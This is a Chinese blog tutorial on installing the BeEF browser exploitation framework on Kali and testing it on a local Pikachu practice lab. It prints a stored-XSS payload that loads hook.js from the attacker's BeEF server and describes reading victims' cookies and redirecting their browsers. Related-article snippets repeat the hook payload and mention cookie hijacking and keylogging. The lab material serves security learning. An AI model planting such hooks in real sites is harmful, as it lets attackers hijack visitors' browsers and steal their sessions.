Beef-xss安装及使用

最新推荐文章于 2024-05-09 16:26:31 发布
最新推荐文章于 2024-05-09 16:26:31 发布
阅读量7.4k 收藏 41
点赞数 1
分类专栏: 安全工具
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_40624810/article/details/110958036
版权

一、背景

BeEF是The Browser Exploitation Framework的缩写。它是一种专注于Web浏览器的渗透测试工具。

随着对包括移动客户端在内的客户网络攻击的担忧日益增加,BeEF允许专业渗透测试人员使用客户端攻击媒介来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了强化的网络边界和客户端系统,并在一个开放的环境中检查可利用性:Web浏览器。BeEF将挂钩一个或多个Web浏览器,并将它们用作启动定向命令模块以及从浏览器上下文中对系统进一步攻击的滩头阵地。

BeEF xss除了是XSS漏洞利用工具,还是一个XSS平台搭建工具,可以本地搭建也可以服务器上搭建,唯一的缺点是:不支持Windows

之前弄过一次,不过失败了。现在重来一遍。首先在kali安装,我的镜像源不是国内的所以安装失败,将源改为中科大的然后apt-get update就行了。参考:https://blog.csdn.net/qq_45766004/article/details/110011811

 

二、安装使用

在kali终端一键安装,如果是ubuntu可能复杂点,要安装各种依赖

sudo apt-get install beef-xss

启动beef

这里提示不能使用默认的账户密码,所以去配置文件中修改。这里我们修改为admin/admin

./beef再次启动(成功)

打开浏览器访问:http://192.168.238.134:3000/ui/panel

使用这里用本地搭建的pikachu靶场,测试beef-xxs

将这段js代码 输入到留言板

<script src=http://192.168.238.134:3000/hook.js></script>

 

点击提交后,查看beef-xss平台。成功上线。

在commands模块查看cookie

网页跳转模块

成功跳转到百度,因为没法录像只能截图所以效果不明显。

这个只是局域网搭建的,可以在公网服务器搭建,有时间试试。更多功能,以后再慢慢补充。

 

qq_40624810
关注
  • 1
    点赞
  • 41
    收藏
    觉得还不错? 一键收藏
  • 5
    评论
专栏目录
XSS自动化工具——Beef
世间繁华梦一出
03-10 5399
Beef使用一、Beef简介二、beef的下载安装三、Beef配置四、Beef使用五、Beef的主要功能 在我的记忆之中之前是有些过关于beef这款工具的使用的文章的,然而最近整理博客,一看,发现怎么没有了,可能是我忘了吧,或者可能也可能是在梦里写了。。。今天来写一下吧 一、Beef简介 Browser Exploitation Framework (BeEFBeEF 是目前最强大的浏览器开源渗透测试框架,通过xss漏洞配合JS脚本和Metasploit进行渗透, BeEF 是基于Ruby语言编写的
记录Debian7安装BeeGFS6
hsdllcw的博客
03-08 596
本次安装于vm虚拟机内进行。1、系统为最小化安装(包括ssh),安装过程使用网络镜像。2、安装好系统后使用ifconfig查看本机ip,然后切出虚拟机用物理机提供的ssh客户端连接(虚拟机内不安装工具不能使用剪贴板)3、vi /etc/apt/sources.list#添加源deb http://mirrors.163.com/debian wheezy main non-free contrib...
阿里云ubuntu16.04安装beef
04-07 445
0x0 前言 环境:阿里云轻量服务器ubuntu16.04 需要安装2.4以上版本的ruby:https://www.cnblogs.com/Rain99-/p/10666247.html 参考资料 A:https://www.cnblogs.com/heijuelou/p/7791689.html B:https://www.freebuf.com/articles/w...
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
Martin-share的博客
02-12 1万+
beef-xss详细教程(一文带你学会beef) | Kali下安装beef | beef-xss反射型,储存型利用 | beef实现Cookie会话劫持 | 键盘监听 | 浏览器弹窗,重定向等
网络安全最全Beefxss使用教程图文教程(超详细)_怎么把beef改成公网ip(3),2024春招面试
最新发布
2401_84302816的博客
05-09 635
beef-XSS界面有很多栏,重点是 Commands 栏的功能指令,其他的基本用不到,不用太留意。Online Browsers:在线浏览器,工具定时发送链接请求,链接成功就会显示在这里。Offline Browsers:离线浏览器Getting Started:入门指南,官方的一些文档Logs:日志,记录工具做过哪些操作Zombies:僵尸,记录可以利用的目标站点Current Browser:上线的浏览器,只有在目标在线的时候才会显示出来。
XSS框架之安装BEEF
3569
07-18 2642
这次部署邮件服务器大致分为3个步骤 » 安装GEM » 安装配置BEEF » 测试 » 安装GEM 步骤 1 » 安装rvm。 wget -O 123 https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer chmod +x 123 ./123 安装环境需
在公网[阿里云服务器]部署Beef-XSS 供练习测试
R4bbit
06-30 3125
添加kali linux 源 方便直接apt-get install 下载软件 搭建php-apache服务器 apt-get install php7.0 apt-get install apache2 这里注意一下,最好是先安装apache再安装php,这样php在安装的时候会连apache所要的文件一并安装安装beef-xss平台 apt-get beef-xss 。 记住...
kali下载beef-xss及利用
qq_53175607的博客
12-15 1686
1.beef-xss下载 使用apt-get update 更新kali(不是管理员用户前面加sudo) apt-get install beef-xss 下载beef(不是管理员用户前面加sudo) 2.利用 启动输入命令beef-xss http://kaliip:3000/ui/panel打开登录页面 构建一个简单的xss html页面 <html> <head> <script src='http://kaliip:3000/hook.js'></
Web应用安全:XSS通过JavaScript攻击(实验).docx
06-20
(附加题)使用beef尝试更多XSS JavaScript功能。 三、实验内容与步骤 在Kali上安装beef-xss工具: 1.1、首先打开Kali,将kali的下载源换成国内中科大的源,在root权限下输入命令:vim /etc/apt/sources.list打开apt...
Web应用安全:XSS篡改页面(实验).docx
06-19
可以使用以下命令来安装beef-xss: cd /usr/share/beef-xss ./beef 2. 接下来,我们需要启动beef-xss工具。在命令终端中输入以下命令: beef-xss 3. 打开Web浏览器,输入http://Kali IP地址:3000/ui/panel,登录...
BeefAuto:无需配置路由器即可自动化 Beef 以通过广域网使用
07-24
python脚本自动化牛肉并通过使用ngrok打开端口将其配置为使用overwan 截图 安装 [ 卡利 ] git 克隆 cd BeefAuto 须藤 pip3 install -r requirements.txt 须藤 bash install.sh 须藤 python3 main.py 经过以下...
网络渗透测试 XSS和SQL注入
12-02
实验目的:了解什么是XSS;了解XSS攻击实施,理解防御XSS攻击的方法;...系统环境:Kali Linux 2、Windows Server网络环境:交换网络结构实验工具: Beef;AWVS(Acunetix Web Vulnarability Scanner);SqlMAP;DVWA
JSShell:交互式多用户Web JS Shell
02-05
该工具可以轻松地附加到XSS(跨站点脚本)有效负载,以实现浏览器远程代码执行(类似于BeeF框架)。 2.0版完全从头开始创建,引入了令人兴奋的新功能,稳定性和可维护性。 版本:2.0 作者 。 壳牌影片 产品特点 ...
Beef xss神器
weixin_30474613的博客
06-08 279
KALI中启动BEEFXSS PAYLOAD为 <script src=”http://攻击机IP:3000/hook.js”></script> 将攻击代码插入到存储型XSS中 受害者访问存储型XSS界面,可以看到受害者不停地与攻击机进行通信 可以执行非常多的功能 2.BruteXSS 地址:https://github.com/...
Beef安装与简单使用
abg49988的博客
11-06 2024
安装 Debian / Ubuntu 安装依赖 sudo apt-get update sudo apt-get install curl git curl -sSL https://raw.githubusercontent.com/wayneeseguin/rvm/master/binscripts/rvm-installer | bash ...
本地搭建beef_xss映射到公网
qq_41671415的博客
02-20 1520
前言:原本很简单的docker安装beef就完事l,结果垃圾阿里yum源居然不能构建缓存,网上的在线xss风险高的一批不敢用, 环境: 服务端:阿里云(centos8),frps 客户端:win 10 , frpc frp安装配置so easy,百度一大堆 docker安装beef so easy,百度一大堆 访问成功: 在这里插入图片描述 ...
浅谈一下xss工具----beef
划水的小白白
05-07 3520
今天主要聊一下,从认识xss的危害到beef-xss的利用 beef是一个类似与sql注入的sqlmap一样,也是一种工具。 一、xss简介 定义: 跨站脚本攻击。xss是一种在web应用中的计算机安全漏洞, 它允许web用户将一些恶意代码植入到提供给其它用户使用的页面中 种类: 反射型xss: 提交得数据成功的实现了xss,但是仅仅是对你这次访问产生了影响,...
Beefxss使用教程图文教程(超详细)
热门推荐
wangyuxiang946的博客
02-16 1万+
Beef-XSS是一款功能强大的「XSS漏洞利用工具」,kali自带,基于Ruby语言开发。
XSS漏洞利用工具BeEF
RockHan
11-06 565
BeEF是Browser Exploitation Framework的缩写。随着人们越来越多地关注针对包括移动客户端在内的客户端的网络传播攻击,BeEF使专业的渗透测试人员可以使用客户端攻击向量来评估目标环境的实际安全状况。与其他安全框架不同,BeEF超越了硬化的网络边界和客户端系统,并在一个门户开放的环境中检查可利用性。BeEF将钩挂一个或多个Web浏览器,并将其用作启动定向命令模块的滩头堡,...
云服务器上搭建beef-xss
03-11
在云服务器上搭建beef-xss(Browser Exploitation Framework)可以用于进行Web浏览器漏洞利用和XSS攻击的测试和研究。下面是一些步骤来搭建beef-xss: 1. 选择云服务器:首先,你需要选择一个云服务器提供商,如阿里云、腾讯云等,并创建一个适合你需求的云服务器实例。 2. 安装操作系统:在云服务器上安装一个支持beef-xss的操作系统,常见的选择是Linux发行版,如Ubuntu、CentOS等。 3. 安装依赖软件:在操作系统上安装必要的软件和工具,如Ruby、RubyGems、Node.js等。具体的安装步骤可以参考beef-xss的官方文档。 4. 下载beef-xss:从beef-xss的官方网站或GitHub仓库下载最新版本的beef-xss。 5. 配置beef-xss:根据你的需求,编辑beef-xss的配置文件,设置监听IP地址、端口号等参数。 6. 启动beef-xss:运行beef-xss的启动命令,启动beef-xss服务。 7. 配置防火墙和网络:确保云服务器的防火墙和网络设置允许外部访问beef-xss服务。 8. 测试和使用使用Web浏览器访问云服务器的IP地址和端口号,进入beef-xss的管理界面,开始进行漏洞测试和XSS攻击。 请注意,在进行任何安全测试和攻击活动之前,确保你已经获得了合法的授权,并且遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值